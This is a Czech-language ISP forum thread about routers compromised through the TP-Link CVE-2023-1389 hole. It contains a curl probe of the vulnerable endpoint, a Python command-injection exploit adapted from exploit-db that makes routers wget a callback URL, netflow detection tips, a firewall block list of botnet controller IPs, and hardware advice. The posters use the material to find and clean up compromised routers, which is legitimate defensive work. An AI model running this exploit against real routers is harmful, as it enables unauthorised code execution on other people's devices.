Zranitelnost v routerech TP-Link (CVE-2023-1389)
- Upraveno
curl -k -d @curl.payload -X POST "https://$1/cgi-bin/luci/;stok=/locale?form=country" -A "python-requests/2.21.0" -H 'Content-Type:' -H "Accept-Encoding: gzip, deflate" -H "Connection: keep-alive"
U těch které jsme měli napadené curl vrátí:
{"data":""}
Ale teda nepodařilo se mi spustit vlastní kód.
Detekce jde dělat podle počtu spojení. A u nás (ale tohle se asi může lišit) všechny útoky jdou z SRC PORT 80. Tím se celkem jednoduše z netflow uděla TOP statistika na základě SRC IP.
- Upraveno
gemb Tahle diskuze je věčná. To je sakra takový problém lidem vysvětlit, že k mobilům za 20k a notebookům za dalších 20k je prostě totální kravina pořizovat čínský krám za tisícovku? 100 Eur za Unifi prostě velký problém být nemůže, lepší jednou za 5-10 let koupit Unifi než kupovat každé 2-3 roky nový levný krám. 99% lidí kterým jsem tohle vysvětlil už ta cena Unifi nepřišla nijak strašná. Nejsme tak bohatí, abychom si mohli dovolit kupovat levné věci.
Já dávám do nenáročných domácností posledních několik let lepší ASUSy (dřív RT-AC66U/RT-AC68U, teď RT-AX56U/RT-AX58U aj. ) a musím zaklepat, problémy s tím prostě žádné nejsou. Wifi funguje parádně, SW podpora super (používám Merlin a jednou za čas všechny routery postupně aktualizuji), má to bezvadně fungující VPN (jak OpenVPN tak už teď i Wireguard), ani jednou jsem nemusel řešit napadnutí, a to jsou mnohé na veřejkách. Lze tam i dobře nastavit VPN klienty s policy routingem, abych mohl mít sítě za nimi přístupné z centrálního místa i tam kde jsou routery za NATem.
Do byť jen trochu náročnějších domácností a malých firem mám léty ověřenou kombinaci pfSense boxu + Unifi, to funguje parádně.
- Upraveno
Asi si dnes sedím na vedení...
Warning: Couldn't read data from file "curl.payload", this makes an empty
Warning: POST.Jsem se možná špatně vyjádřil. Ten string mi vrátí jakákoliv C6, i nenapadená.
U EX a EC modelů mi vrátí nějakou chybu 403, 500 atd... Ale teda musím říct, že tyto modely jsem u nás zatím napadené neviděl. Vše co jsme měli bylo C6, AX23, AX50.
TP-link co se týče zranitelných modelů zatím neodpověděl.
... workaround kolem toho byla změna povolené remote ip a tím se to tomu curlu zavřelozda se, ze ISP verze s agile firmware jsou v pohode, problem maji retailove verze.
- Upraveno
import requests, urllib.parse, argparse
parser = argparse.ArgumentParser()
parser.add_argument("-r", "--router", dest = "router", default = "192.168.0.1", help="Router name")
parser.add_argument("-id", "--id", dest = "id", default = "1234", help="id for callback")
args = parser.parse_args()
revshell = urllib.parse.quote("wget http://MUJ.WEB/index.php?clbk=" + args.id);
url_command = "https://" + args.router + "/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(" + revshell + ")"
r = requests.get(url_command, verify=False)
r = requests.get(url_command, verify=False)Tohle je ještě kus pythonu vybrakovany odsud https://www.exploit-db.com/exploits/51677
Tohle mi už spouští kód na AX23,20 a 50
Mám tam zadaný wget na vlastní web kde si loguji přístupy dle toho "id" ktere se zadava. Asi dobrý postup je pustit ten curl na všechny IP a ty kde vrati ten string "data" ještě prozkoumat tímto pythonem.
Odhaduju, že útok na C6ky bude trochu jiný, ale dle chování myslím, že je také přes mng. vystavený do internetu.
https://github.com/Voyag3r-Security/CVE-2023-1389
pomoci tohoto to jde rebootnout, nebo pustit jakykoli prikaz. Pokud zakazete spojeni smerem na tplink a rebootnete ho, prestane to chrlit bordel, protoze to nebude mit instrukce
Vím, že to není pro každého a kór u vás v tom velkým množství, ale já mám rád OpenWrt. Tp-Link měl i v nových fw hloupé chyby, že router neudržel Prefix delegation a podobné chyby... po přechodu na OpenWrt je to luxusní zařízení za pár kaček.
TP-Link Archer C6 v2: https://openwrt.org/toh/tp-link/archer_c6_v2
TP-Link Archer C6 v3: https://openwrt.org/toh/tp-link/archer_c6_v3
V podstatě o tom nevím dělá to co má. Pravidelné aktualizace. Ano nejsou podporována všechna zařízení.
jcltm Vysvetlit to nie je problem, problem je, ze ti ludia to bud neakceptuju, alebo tomu neveria. Vacsinou sa takato diskusia konci "ale ved to musi stacit" my aj tak nemame rychly internet 
. Nechapu, ze to s tym nesuvisi, ze to stacit nebude, ked sa na to doma vsetci pripoja. Ked si k nam ludia pridu kupit novy router, oci im okamzite padnu na tie za 20€ a tazko sa lamu na drahsie. "Priplatia" (aj ked z mojho pohladu, kupuju na dnesnu dobu standard) si len ti, ktori prichadzaju s poziadavkou "potrebujeme silnejsi wifi signal". S tymi sa uz da diskutovat a nechaju si vysvetlit ako to funguje.
- Upraveno
U nas to kontroluje pres src 9511, z flowmonu jsem vytahl nejakych 5ks IP controlleru a zahodil. Uvidime jak rychle se to preprogramuje 
ip firewall address-list
add address=159.65.27.199 list=Condi-DDoS-Botnet-controllers
add address=167.172.160.146 list=Condi-DDoS-Botnet-controllers
add address=170.64.150.59 list=Condi-DDoS-Botnet-controllers
add address=64.227.129.12 list=Condi-DDoS-Botnet-controllers
add address=79.110.48.149 list=Condi-DDoS-Botnet-controllers
/ip firewall filter
add action=drop chain=forward protocol=tcp src-address-list=Condi-DDoS-Botnet-controllers src-port=9511
Na Archer C6 vyšla aktualizace. Máte někdo prosím info jestli opravuje tuhle chybu?
My máme těchto routerů na veřejkách hadám tak stovky ks ale nepozoruji žádný problém. Není to tím že mám webmanagement na jiném než default portu a tento port blokovaný v celé síti z internetu dovnitř na centrálním routeru ?